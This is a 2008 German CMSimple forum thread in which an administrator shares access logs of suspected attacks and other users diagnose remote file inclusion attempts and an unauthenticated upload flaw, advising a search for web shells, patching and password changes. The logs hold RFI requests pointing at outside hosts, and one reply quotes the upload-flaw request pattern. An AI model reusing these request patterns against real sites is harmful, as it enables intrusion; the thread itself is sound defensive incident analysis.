Einbruch über memberspages-Plugin ?Hallo in die Runde

Ein CMSimple Support Forum für deutsch sprechende Nutzer und Entwickler
Post Reply
beate_r
Posts: 174
Joined: Thu May 22, 2008 11:44 pm
Location: Hessen / Germany

Einbruch über memberspages-Plugin ?Hallo in die Runde

Post by beate_r » Tue Jun 17, 2008 3:23 pm

Hallo in die Runde,

ganz sicher bin ich mir nicht ... kann es sein, dass der folgende Auszug aus meinen log-Dateien einen erfolgreichen Einbruch über das memberspages-Modul dokumentiert?

Hintergrund:

auf einer der von mir betreuten Seiten befindet sich ein geschützter Bereich. Die Seiten enthalten Adresslisten von Ärzten. Nicht zum ersten Mal ist mir aufgefallen, dass die Seiten korrumpiert waren. Einmal waren sämtliche Telefonnummern mit seltsamen skype-wrappern versehen, und dreimal waren die Inhalte aus der content.htm gelöscht.

Das letzte Mal konnte ich das auf den Zeitraum vom 4.6 - 8.6. eingrenzen, und tatsächlich gab es am 6.6. mehrere Angriffsversuche auf die Site, und zwar von den IP-Adressen 202.164.251.11 (aus Japan) und 85.74.111.113 (aus Griechenland). Was ja nicht viel sagt; sowas kann man fälschen.

Auffällig finde ich beispielsweise, dass bei den Zugriffen mit dem in das Argument der URL codierten Link nahezu 10 kB übertragen wurden - trotz Fehler 404.

Wie schätzt Ihr das ein?


Hier die Log-Datei.

Die beiden URLs habe ich ebenfalls angeschaut, die erste gibt es nicht mehr.

Code: Select all

202.164.251.11 - - [06/Jun/2008:15:22:53 +0200] "GET / HTTP/1.0" 200 31057 "-" "Mozilla/4.0 (compatible; MSIE 7.
0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:22:55 +0200] "GET /?http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fanaw
uho%2Fohuhiru%2F HTTP/1.0" 404 9490 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; 
.NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:22:56 +0200] "GET /?http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublica
ciones%2Ffotos%2Femesuki%2Flewu%2F HTTP/1.0" 404 9526 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .N
ET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:22:57 +0200] "GET /?http%3A%2F%2Fwww.stomol.ru%2Fcatalog%2Frivoz%2Fifewaf%2F 
HTTP/1.0" 404 9456 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322
)"
202.164.251.11 - - [06/Jun/2008:15:22:59 +0200] "GET /?LITERATUR HTTP/1.0" 200 21907 "-" "Mozilla/4.0 (compatibl
e; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:00 +0200] "GET /?LINKS HTTP/1.0" 200 13844 "-" "Mozilla/4.0 (compatible; M
SIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:01 +0200] "GET /?TERMINE HTTP/1.0" 200 10768 "-" "Mozilla/4.0 (compatible;
 MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:03 +0200] "GET /?PROGRAMM HTTP/1.0" 200 21108 "-" "Mozilla/4.0 (compatible
; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:04 +0200] "GET /?WER_WIR%0A__SIND HTTP/1.0" 200 9823 "-" "Mozilla/4.0 (com
patible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:06 +0200] "GET /?KONTAKT_-_IMPRESSUM HTTP/1.0" 200 11755 "-" "Mozilla/4.0 
(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:07 +0200] "GET /?AKTUELLES&login HTTP/1.0" 200 31095 "-" "Mozilla/4.0 
(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:09 +0200] "GET /?AKTUELLES:RSS_Feed HTTP/1.0" 200 1626 "-" "Mozilla/4.0 (c
ompatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:09 +0200] "GET /?LITERATUR&print HTTP/1.0" 200 21927 "-" "Mozilla/4.0 
(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:11 +0200] "GET /?LINKS:Gesch%FCtzt%3A_Medizinisches%2C_Gutachter:Gruppen_u
nd_andere_Links HTTP/1.0" 200 11703 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; 
.NET CLR 1.1.4322)"
Top
mvwd
Posts: 299
Joined: Tue Jun 17, 2008 10:35 pm
Location: Baden Württemberg / Germany
Contact:
Contact mvwd

Re: Einbruch über memberspages-Plugin ?Hallo in die Runde

Post by mvwd » Wed Jun 18, 2008 3:12 am

Hallo Beate,

..das sieht mir doch tatsächlich zumindest nach einem Hackversuch aus!
Ich denke, hier wurde versucht über Remote-File-Inclusion eine Datei ins System einzuschleussen.

Erfolreiche Hackversuche tauchen in der Logdatei mit POST ?sl=../adm&adm=1 auf.
Über eine Sicherheitslücke der CMSimple-Versionen bis einschliesslich V.3.1 ist es möglich, Dateien hochzuladen ohne CMSimple-Admin-Anmeldung.

Mein Tipp:
1. Gesamten Webspace nach unbekannten Dateien absuchen (z.B. Shell-Scripts r57.php / c99.php / s.php....). Sollten solche Files irgendwo rumliegen, könnten Unbefugte auf den Server zugreifen, Daten manipulieren / löschen / uploaden...
Noch besser: den kompletten Webspace neu aufsetzen (evt. aus einer Datensicherung), um auszuschliessen dass irgendwelche Files unerwünschten Code beinhalten.
2. Dringend den aktuellsten Security-Fix installieren, dieser schliesst diese Lücke. Link: http://www.cmsimple.com/?Downloads:Security_fix
3. Passwörter ändern.

Daß das mit memberpages zu tun haben könnte, glaube ich nicht. Allerdings habe ich dieses Tool nicht wirklich ausprobiert... Vielleich kann jemand erfahreneres etwas dazu sagen!?

mvwd.
Top
johnjdoe
Posts: 571
Joined: Tue May 20, 2008 6:32 am

Re: Einbruch über memberspages-Plugin ?Hallo in die Runde

Post by johnjdoe » Wed Jun 18, 2008 7:13 am

Und du kannst immer zusätzlich noch GXSecurity installieren: http://xtc.xhonneux.com/?Projekte:GXSecurity

Das ist ein Sicherheitsplugin für CMSimple, das schon diverse Angriffe verhindern sollte (oder es zumindest versucht).
Top
beate_r
Posts: 174
Joined: Thu May 22, 2008 11:44 pm
Location: Hessen / Germany

Re: Einbruch über memberspages-Plugin ?Hallo in die Runde

Post by beate_r » Wed Jun 18, 2008 10:51 am

Hallo in die Runde,

gut, dass Ihr das ähnlich seht wie ich - ich habe schon das Gefühl, über das Maß dessen paranoid zu werden, was ein Sysadmin für sein Tagesgeschäft benötigt. Leider muss ich davon ausgehen, dass diese Seite gezielt von ein paar Leuten, denen sie ein Dorn im Auge ist, gehackt worden ist, genauso wie wenige Tage später meine private Homepage (eine umfangreiche Drupal-4.7.x-Installation).

GXSecurity ist bei mir nicht aktiv - beim ersten Aufsetzen der Seite (unter 2.7 oder 2.8 oder so) klemmte es ein wenig. Es ist sicherlich an der Zeit, hier erneut ein wenig Aufwand zu investieren.

Ich verwende ein 2.9 mit dem oben erwähnten Bugfix, blocke sogar Requests mit dem sl= - Argument ab und habe auch das vorletzte Sicherheitsupdate drin (die geänderte login.php).

Ansonsten ist meine Seite soweit abgesichert, dass sie auch die Angriffe überstanden hat, die das oben erwähnte Exploit aus der jüngsten Vergangenheit ausnutzen wollten (am 10.6 gab es noch ein paar vergebliche Versuche). Aus meinen Log-Dateien sehe ich, dass diese Angriffsversuche auch alle abgewehrt werden.

Im Klartext: ich habe die Befürchtung, dass da ein weiteres Loch sein könnte, zusätzlich zu den bisher bekannten, und dass dieses konkret das memberspages-Modul betreffen könnte. Ich bin mir allerdings nicht sicher. Daher die Frage und gleichzeitig auch Mahnung zur Umsicht.

Viele Grüße

Beate
Top
Post Reply

Return to “Deutsch”